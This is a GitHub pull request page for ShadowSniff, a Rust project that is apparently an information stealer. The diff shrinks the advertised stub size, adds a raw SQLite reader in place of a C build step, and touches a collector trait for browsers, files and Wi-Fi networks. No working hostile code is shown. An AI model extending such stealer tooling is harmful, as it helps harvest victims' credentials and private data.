Skip to content

feat: sqlite hardcoded #39

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Draft
wants to merge 7 commits into
base: master
Choose a base branch
from
Draft
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
23 changes: 7 additions & 16 deletions Cargo.lock

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

3 changes: 2 additions & 1 deletion README.MD
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@
<a href="https://github.com/sqlerrorthing/ShadowSniff/network/members"><img src="https://img.shields.io/github/forks/sqlerrorthing/ShadowSniff?style=for-the-badge&labelColor=%239f0000&color=%23D73332" alt="Forks"></a>
<a href="https://github.com/sqlerrorthing/ShadowSniff/stargazers"><img src="https://img.shields.io/github/stars/sqlerrorthing/ShadowSniff?style=for-the-badge&labelColor=%239f0000&color=%23D73332" alt="Stargazers"></a>
<a href="https://github.com/sqlerrorthing/ShadowSniff/issues"><img src="https://img.shields.io/github/issues/sqlerrorthing/ShadowSniff?style=for-the-badge&labelColor=%239f0000&color=%23D73332" alt="Issues"></a>
<img src="https://img.shields.io/badge/STUB%20SIZE-700KB-red?style=for-the-badge&labelColor=%239f0000&color=%23D73332" alt="Stub size">
<img src="https://img.shields.io/badge/STUB%20SIZE-200KB-red?style=for-the-badge&labelColor=%239f0000&color=%23D73332" alt="Stub size">
<a href="https://github.com/sqlerrorthing/ShadowSniff/blob/master/LICENSE"><img src="https://img.shields.io/github/license/sqlerrorthing/ShadowSniff?style=for-the-badge&labelColor=%239f0000&color=%23D73332" alt="License"></a>
</div>
</div>
Expand Down Expand Up @@ -108,6 +108,7 @@ I’d like to thank everyone whose contributions helped shape this project — w

- [davimiku](https://github.com/davimiku/json_parser) — for a clean and efficient JSON parser implementation
- [CasualX](https://github.com/CasualX/obfstr) — for compile-time string obfuscation
- [geoffreycopin](https://github.com/geoffreycopin/rqlite) — for a sqlite3 raw reader

...and many others whose code, ideas, or techniques helped shape this project —
even if only through a single clever line of Rust.
Expand Down
3 changes: 1 addition & 2 deletions collector/src/lib.rs
Original file line number Diff line number Diff line change
Expand Up @@ -64,8 +64,7 @@ pub trait Device: Send + Sync {
increase_count!(wifi_networks);
}

pub trait Collector: Send + Sync
{
pub trait Collector: Send + Sync {
type Browser: Browser;
type Software: Software;
type FileGrabber: FileGrabber;
Expand Down
6 changes: 2 additions & 4 deletions database/Cargo.toml
Original file line number Diff line number Diff line change
Expand Up @@ -3,9 +3,7 @@ name = "database"
version = "0.1.0"
edition = "2024"

[build-dependencies]
cc = "1.0"

[dependencies]
utils = { path = "../utils" }
obfstr = "0.4.4"
obfstr = "0.4.4"
anyhow = { version = "1.0.98", default-features = false }
72 changes: 0 additions & 72 deletions database/build.rs

This file was deleted.

Loading